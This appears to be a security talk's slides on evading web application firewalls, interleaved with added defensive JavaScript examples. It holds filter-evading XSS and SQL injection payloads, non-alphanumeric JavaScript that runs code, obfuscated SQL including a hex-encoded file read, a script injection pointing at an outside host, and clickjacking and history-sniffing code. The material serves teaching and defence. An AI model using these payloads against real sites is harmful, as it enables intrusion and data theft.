Bypassing Web Application Firewalls (WAFs)

Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant

www.nethemba.com
Nethemba – All About Security
- Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
- Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
- OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
- We are the only ones in Slovakia/Czech Republic that offer:
  - Penetration tests and security audits of SAP
  - Security audits of smart RFID cards
  - Unique own and sponsored security research in many areas (see our references – vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)
What are WAFs?
- Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
- Usually contain a lot of complex regexp rules to match
- Support special features like cookie encryption, CSRF protection, etc.
- Except for the free mod_security they are quite expensive (and often there is no correlation between the price and their filtering capabilities)
WAF implementations
- Usually they are deployed in “blacklisting mode”, which is more vulnerable to bypasses and targeted attacks
- The application “context” (the type of allowed inputs) must be known in order to deploy the more secure “whitelisting mode”
- All WAFs can be bypassed
- A WAF is just a workaround, but from the security point of view it can be cost-effective
WAF filter rules
- Directly reflect WAF effectiveness
- For most WAF vendors they are closely guarded secrets – most determined attackers are able to bypass them without seeing the actual rules
- Open-source WAFs (mod_security, PHPIDS) have open-source rules, which allows more scrutiny by skilled penetration testers
Typical WAF bypasses

Blocked attack                               Undetected modification
'or 1=1--                                    ' or 2=2--
alert(0)                                     %00alert(0)
<script>alert(0)</script>                    <script type=vbscript>MsgBox(0)</script>
' or ''''='r                                 '/**/OR/**/''''='
<script>alert(0)</script>                    <img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>       <img src=http://url onload=alert(0)//></img>
1 or 1=1                                     (1)or(1)=(1)
eval(name)                                   x=this.name
                                             X(0?$:name+1)
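A defender-side view of the table above, added here as an example and not taken from the slides: a handful of blacklist-style rules are run once on the raw parameter and once on a canonicalised copy (URL-decoded, NUL bytes dropped, C-style comments replaced by a space, whitespace collapsed, lower-cased), which is the same idea as a WAF's transformation pipeline. The rule regexes, rule names and the sample pairs are constructed for this example; the pairs are the rows of the table.

```javascript
// Added example (not from the slides): why a rule matched on the raw value
// misses several "undetected modification" payloads, and how canonicalising
// the input before matching closes some of those gaps.

// Canonicalise a request parameter before matching any rule.
function normalize(param) {
  let s = param;
  try {
    s = decodeURIComponent(s);              // "%00alert(0)" -> "\0alert(0)"
  } catch (e) {
    // malformed %xx sequence: keep the raw value rather than failing open
  }
  s = s.replace(/\0/g, '');                 // drop NUL bytes
  s = s.replace(/\/\*[\s\S]*?\*\//g, ' ');  // C-style comments -> single space
  s = s.replace(/\s+/g, ' ').trim();        // collapse whitespace
  return s.toLowerCase();
}

// A few blacklist rules in the spirit of the table (constructed for this example).
const RULES = [
  // "or X=X" with the same atom on both sides, parentheses tolerated
  { name: 'sql-tautology', re: /\bor\b[\s(]*([\w']+)[\s)]*=[\s(]*\1(?![\w'])/i },
  // a quote, OR, and another quote: the quote-confusion pattern in the table
  { name: 'sql-quote-or',  re: /'\s*or\s*'/i },
  { name: 'js-alert',      re: /\balert\s*\(/i },
  { name: 'html-script',   re: /<script\b/i },
  { name: 'html-onevent',  re: /\bon\w+\s*=/i },
];

// Names of the rules that fire on a string exactly as given.
function matchRules(s) {
  return RULES.filter(r => r.re.test(s)).map(r => r.name);
}

// Constructed pairs taken from the table: blocked form, modified form.
const PAIRS = [
  ["'or 1=1--",                 "' or 2=2--"],
  ['alert(0)',                  '%00alert(0)'],
  ["' or ''''='r",              "'/**/OR/**/''''='"],
  ['1 or 1=1',                  '(1)or(1)=(1)'],
  ['<script>alert(0)</script>', '<img src="x:x" onerror="alert(0)"></img>'],
];

// What the rule set sees on the raw modified value versus the canonicalised one.
function evaluatePairs() {
  return PAIRS.map(([blocked, modified]) => ({
    blocked,
    modified,
    rawHits: matchRules(modified),
    normalizedHits: matchRules(normalize(modified)),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const row of evaluatePairs()) console.log(JSON.stringify(row));
}
```

Two of the table's rows illustrate the two failure classes: `%00alert(0)` and `'/**/OR/**/''''='` match nothing on the raw value but fire after canonicalisation, while `' or 2=2--` and `(1)or(1)=(1)` are only caught because the tautology rule compares both sides of the `=` instead of looking for the literal `1=1`. Canonicalisation only helps when the rule behind it describes the attack class rather than one sample string, which is the point of the slide.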
Yes, a WAF may also be vulnerable!
- A WAF also increases the attack surface of the target organization
- A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks, remote code execution vulnerabilities
- These vulnerabilities have been found in all types of WAF products(!)
Typical bypass flow
1. Find out which characters / sequences are allowed by the WAF
2. Make an obfuscated version of your injected payload
3. Test it and watch the WAF/application response
4. If it does not work, modify it and repeat from step 2
Javascript obfuscation
- Javascript has very powerful features
- A Javascript payload is used in XSS attacks
- It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
- Supports a lot of encodings (unicode – multibyte characters, hexadecimal, octal, and combinations of all of them)
- Supports XOR, “encryption”, Base64
Non-alphanumeric javascript code
- Even if only a few characters are allowed it is possible to construct fully functional code:
  _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];($)[$$][$$]($$$+"('"+$_$+"')")()
  ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)
Let's bypass the WAF!
- Example situation: the WAF blocks alpha characters and numbers (probably not a very realistic situation, just a proof-of-concept :-)
- It allows only a few special characters: (){}_=[];$"!+<>
- Let's generate fully non-alphanumeric javascript code!
Possibilities of the Javascript language
- We can use numbers to obtain a single character in a string, e.g. index zero for accessing the first character: "abc"[0]
- We can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (--)
- We know that mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion
Source of different alphanumeric characters in Javascript

Javascript object / error state    String result
{}+''                              “[object Object]”
+[][+[]]                           “NaN”
[][+[]]+[]                         “undefined”
[![]]+[]                           “false”
[!![]]+[]                          “true”
Shortest Possible Ways to Create Zero without Using Numbers

Characters    Result
+[]           0
+''           0
+""           0
-[]           0
-''           0
-""           0
Generating numbers
  +[] //0
  ++[[]][+[]] //1
  +!+[] //1
  ++[++[[]][+[]]][+[]] //2
  !+[]+!+[] //2
  ++[++[++[[]][+[]]][+[]]][+[]] //3
  !+[]+!+[]+!+[] //3
Gain alpha characters without directly using them
- When we define a Javascript object using the object literal and concatenate it with a string, the result is [object Object]
  _={}+''; //[object Object]
  alert(_[1]) //returns the 'o' character
Generate the string “alert” without using any alphanumeric characters
- Let's start with 'a'
- What Javascript object contains 'a'?
- We can use 'NaN' (Not a Number)
- Access the empty array [] with index 0 (undefined) and convert it to a number (NaN)
  +[][+[]] // result: NaN
Generating the 'a' character
- 'NaN'[1] = 'a'
  ++[[]][+[]] //1
  +[][+[]]+[] // result string: NaN
  (+[][+[]]+[])[++[[]][+[]]] //a
- We have the character 'a'
Generating the 'l' character
- Use boolean false
- We can use the ! (NOT) operator, e.g. ''==0 //true
- Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string
  ([![]]+[]) //string “false”
  ++[++[[]][+[]]][+[]] //2
  'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]] // 'l'
- We have the 'l' character!
Generating the 'e' character
- It's easy, we can use boolean true
  ([!![]]+[]) // string 'true'
  ++[++[++[[]][+[]]][+[]]][+[]] //3
  'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //e
- And we have the 'e' character!
Generating the 'r' character
- It's easy, we can use boolean true
  ([!![]]+[]) // string 'true'
  ++[[]][+[]] //1
  'true'[1] = ([!![]]+[])[++[[]][+[]]] //r
- And we have the 'r' character!
Generating the 't' character
- It's easy, we can use boolean true
  ([!![]]+[]) // string 'true'
  +[] //0
  'true'[0] = ([!![]]+[])[+[]] //t
- And we have the 't' character!
And now we have the 'alert' string!
  (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'alert'
How to execute the code of our choice?
- It is necessary to get the window object, to access all properties of window
- If you can access a constructor, you can access the Function constructor to execute arbitrary code
- The shortest possible way to get window is:
  alert((1,[].sort)()) // shows the window object!
- Works in all browsers except IE
How to generate the 'sort' string
- We know how to generate the string 'alert'
- We need to generate the 'sort' string
  'false'[3] = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //'s'
- We can gain 'o' from []+{} ([object Object])
  ([]+{})[++[[]][+[]]] //o
- We have already generated 'r' and 't'
And now we have the 'sort' string
  ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] //string 'sort'
Let's build it together – call alert(1)
- (1,[].sort)().alert(1)
- After changing the number 1 and all alpha characters to their obfuscated version we get:
  ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) //calls alert(1)!
How to call any arbitrary Javascript function
- Using the array constructor (accessing the constructor twice from an array object returns Function):
  [].constructor.constructor("alert(1)")()
- We need to generate the rest of the letters 'c','n','u'; gain them from the output of the [].sort function:
  function sort() { [native code] }
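The character tables and the hand-built 'alert' and 'sort' strings from the preceding slides, together with the window and Function-constructor slides, can all be checked in a modern engine. The block below is an added example, not code from the deck: it evaluates each source expression from the “Source of different alphanumeric characters” table, reports where a given letter can be read from, verifies the deck's 'alert' and 'sort' expressions, and tests the two execution primitives. The helper names (`evalExpr`, `locate`, `coverage`, `sortReturnsGlobal`) are this example's own; `globalThis` is assumed to be the object the slides call window.

```javascript
// Added example (not from the slides): check the building blocks the deck
// derives by hand. Plain JavaScript for Node; no browser APIs are used.

// Evaluate an expression string in isolation (no access to local scope).
function evalExpr(expr) {
  return Function('return (' + expr + ')')();
}

// The five letter "sources" from the slide table: expression text -> claimed string.
const SOURCES = {
  '{}+""':        '[object Object]',
  '+[][+[]]+[]':  'NaN',
  '[][+[]]+[]':   'undefined',
  '[![]]+[]':     'false',
  '[!![]]+[]':    'true',
};

// Does every source expression really yield the string the table claims?
function sourcesMatchTable() {
  return Object.entries(SOURCES).every(([expr, want]) => evalExpr(expr) === want);
}

// First place a letter can be read from: [sourceExpression, index], or null.
// The deck picks 'e' from "true"[3]; this lookup finds "[object Object]"[4]
// first, which works just as well.
function locate(ch) {
  for (const [expr, str] of Object.entries(SOURCES)) {
    const i = str.indexOf(ch);
    if (i !== -1) return [expr, i];
  }
  return null;
}

// Which distinct letters of a word the table cannot supply at all.
function coverage(word) {
  const missing = [...new Set(word)].filter(ch => locate(ch) === null);
  return { word, missing };
}

// The deck's expressions for 'alert' and 'sort', copied verbatim from the slides.
const ALERT_EXPR = '(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]';
const SORT_EXPR  = '([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]';

// The slide's route to the global object: an unbound call of [].sort.
// ES5 and later engines throw a TypeError (sort called on undefined `this`),
// so this returns false in Node and in current browsers.
function sortReturnsGlobal() {
  try {
    return (1, [].sort)() === globalThis;
  } catch (e) {
    return false;
  }
}

// Accessing the constructor twice from an array yields Function, as stated
// on the "How to call any arbitrary Javascript function" slide.
function arrayConstructorTwiceIsFunction() {
  return [].constructor.constructor === Function;
}

// The stringified native sort, the slide's source for 'c', 'n' and 'u'.
function nativeSortSource() {
  return String([].sort);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('table holds:', sourcesMatchTable());
  console.log('alert ->', evalExpr(ALERT_EXPR), ' sort ->', evalExpr(SORT_EXPR));
  console.log('constructor letters missing:', coverage('constructor').missing);
  console.log('window via [].sort:', sortReturnsGlobal());
}
```

Two observations fall out of running it. The 'c', 'n' and 'u' that the deck takes from `function sort() { [native code] }` are already present in the table's own strings ("[object Object]"[5], "undefined"[1] and "undefined"[0]), so `coverage('constructor')` reports nothing missing; the only letter of "window" the table cannot supply is 'w'. And the `(1,[].sort)()` trick is specific to engines that predate ES5 semantics: on a current engine `sortReturnsGlobal()` returns false because the unbound call throws, which is the caveat to the slide's "works in all browsers except IE".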
SQL obfuscation
- What is obfuscation of an SQL injection vector?
- Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representation, escaping, hashing algorithms (MD5, SHA-1)
- Many “blacklisted” characters can be replaced by their functional alternatives (0xA0 in MySQL)
- Obfuscated comments – it is difficult to determine what is a comment and what is not
SQL obfuscation examples
- SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
- s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
- SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
- SELECT(extractvalue(0x3C613E61646D696E3C2F613, 0x2F61))
New SQL features
- MySQL/PostgreSQL support XML functions:
  SELECT UpdateXML('<script x=_></script>','/script/@x','src=//0x.lv');
- HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object) – can be misused for persistent XSS and local SQL injection attacks
Existing obfuscation tools
- Hackvertor http://hackvertor.co.uk/public
- HackBar https://addons.mozilla.org/en-US/firefox/addon/hack
- Malzilla http://malzilla.sourceforge.net/
- Your imagination :)
Summary
- WAFs are just workarounds!
- The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
- Use whitelisting instead of blacklisting (both in the application and in the WAF!)
- Use multilayer security – 3-layer database architecture or database firewalls
- For SQL use “prepared” statements
- For HTML use HTML Purifier or the OWASP AntiSamy project
References
- Web Application Obfuscation http://www.amazon.com/Web-Application-Obfuscati
- XSS Attacks: Cross Site Scripting Exploits and Defense http://www.amazon.com/XSS-Attacks-Scripting-Exp
- Special thanks to Mario Heiderich and Stefano Di Paola
UI redressing attacks – clickjacking
  <style>
  iframe { filter: alpha(opacity=0); opacity: 0;
  position: absolute; top: 0px; left: 0px;
  height: 300px; width: 250px; }
  img { position: absolute; top: 0px; left: 0px;
  height: 300px; width: 250px; }
  </style>
  <img src="WHAT THE USER SEES"/>
  <iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>
Clickjacking protection
- Block framing using X-Frame-Options: NEVER
  <body>
  <script>
  if (top!=self) document.write('<plaintext>');
  </script>
  ...
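The response-header side of the protection above, as an added example that is not part of the deck. The slide's `top!=self` script only runs once the page has already been loaded inside a foreign frame; the `X-Frame-Options` header (whose defined values are DENY and SAMEORIGIN) and the CSP `frame-ancestors` directive let the browser refuse to render the page in a frame at all. The header set, the classifier and the sample responses are constructed for this example.

```javascript
// Added example (not from the slides): emit the anti-framing headers and
// classify sample responses by whether they stop third-party framing.

// Headers a server should send on any page that must never be framed.
function frameProtectionHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}

// Case-insensitive header lookup over a plain object of response headers.
function getHeader(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? null : headers[key];
}

// Classify a response:
//   'csp'  - frame-ancestors present and not open to arbitrary origins
//   'xfo'  - X-Frame-Options DENY or SAMEORIGIN, no frame-ancestors directive
//   'none' - nothing stops a foreign page from framing it
function framingProtection(headers) {
  const csp = getHeader(headers, 'Content-Security-Policy');
  if (csp) {
    const m = /frame-ancestors\s+([^;]+)/i.exec(csp);
    if (m) {
      const sources = m[1].trim().toLowerCase();
      // "*" or a bare scheme source still lets any site frame the page
      return /(^|\s)(\*|https?:)(\s|$)/.test(sources) ? 'none' : 'csp';
    }
  }
  const xfo = getHeader(headers, 'X-Frame-Options');
  if (xfo && /^(deny|sameorigin)$/i.test(xfo.trim())) return 'xfo';
  return 'none';
}

// Constructed sample responses, as a server-side check might see them.
const SAMPLES = {
  login:  { 'Content-Type': 'text/html', ...frameProtectionHeaders() },
  legacy: { 'content-type': 'text/html', 'x-frame-options': 'SAMEORIGIN' },
  widget: { 'Content-Type': 'text/html', 'Content-Security-Policy': 'frame-ancestors *' },
  open:   { 'Content-Type': 'text/html' },
};

// Name -> classification for every sample response.
function auditSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) out[name] = framingProtection(headers);
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSamples());
}
```

Sending both headers is deliberate: browsers that understand `frame-ancestors` use it and ignore `X-Frame-Options`, while older ones fall back to `X-Frame-Options`. A response that carries only `frame-ancestors *` is classified as unprotected, since that directive explicitly permits any origin to frame the page.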
CSS History attack
  <style>
  a { position: relative; }
  a:visited { position: absolute; }
  </style>
  <a id="v" href="http://www.google.com/">Google</a>
  <script>
  var l=document.getElementById("v");
  var c=getComputedStyle(l).position;
  c=="absolute"?alert("visited"):alert("not visited");
  </script>
CSS History exploitation methods
- Social network deanonymization attacks
- Session ID/CSRF token local brute force attack
- LAN scanners
- Fixed in Firefox 4.0, current browsers are vulnerable

Mais conteúdo relacionado

Mais procurados

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Damien Seguy
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascriptStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practicesSultan Khan
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Ajay Khatri
 
Intro to computer vision in .net update
Intro to computer vision in .net   updateIntro to computer vision in .net   update
Intro to computer vision in .net updateStephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaoladrewz lin
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)Ajay Khatri
 
PHP security audits
PHP security auditsPHP security audits
PHP security auditsDamien Seguy
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 

Mais procurados (20)

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web security
Web securityWeb security
Web security
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practices
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
 
Intro to computer vision in .net update
Intro to computer vision in .net   updateIntro to computer vision in .net   update
Intro to computer vision in .net update
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 

Destaque

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityHackerOne
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewallsalexmeisel
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityXavier Perseguers
 
Apache mod security 3.1
Apache mod security   3.1Apache mod security   3.1
Apache mod security 3.1Hai Dinh Tuan
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection Abhishek Singh
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeChristian Folini
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewallsEnclaveSecurity
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Sophos Benelux
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Deivid Toledo
 

Destaque (10)

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And Modsecurity
 
Apache mod security 3.1
Apache mod security   3.1Apache mod security   3.1
Apache mod security 3.1
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
WAF in Scale
WAF in ScaleWAF in Scale
WAF in Scale
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 

Semelhante a Bypassing Web Application Firewalls

Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
Slides
SlidesSlides
Slidesvti
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Securityamiable_indian
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT - Multimediatreff
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyEoin Keary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 

Semelhante a Bypassing Web Application Firewalls (20)

JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Java script obfuscation
Java script obfuscationJava script obfuscation
Java script obfuscation
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Slides
SlidesSlides
Slides
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Security
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
XSS Defence with @manicode and @eoinkeary
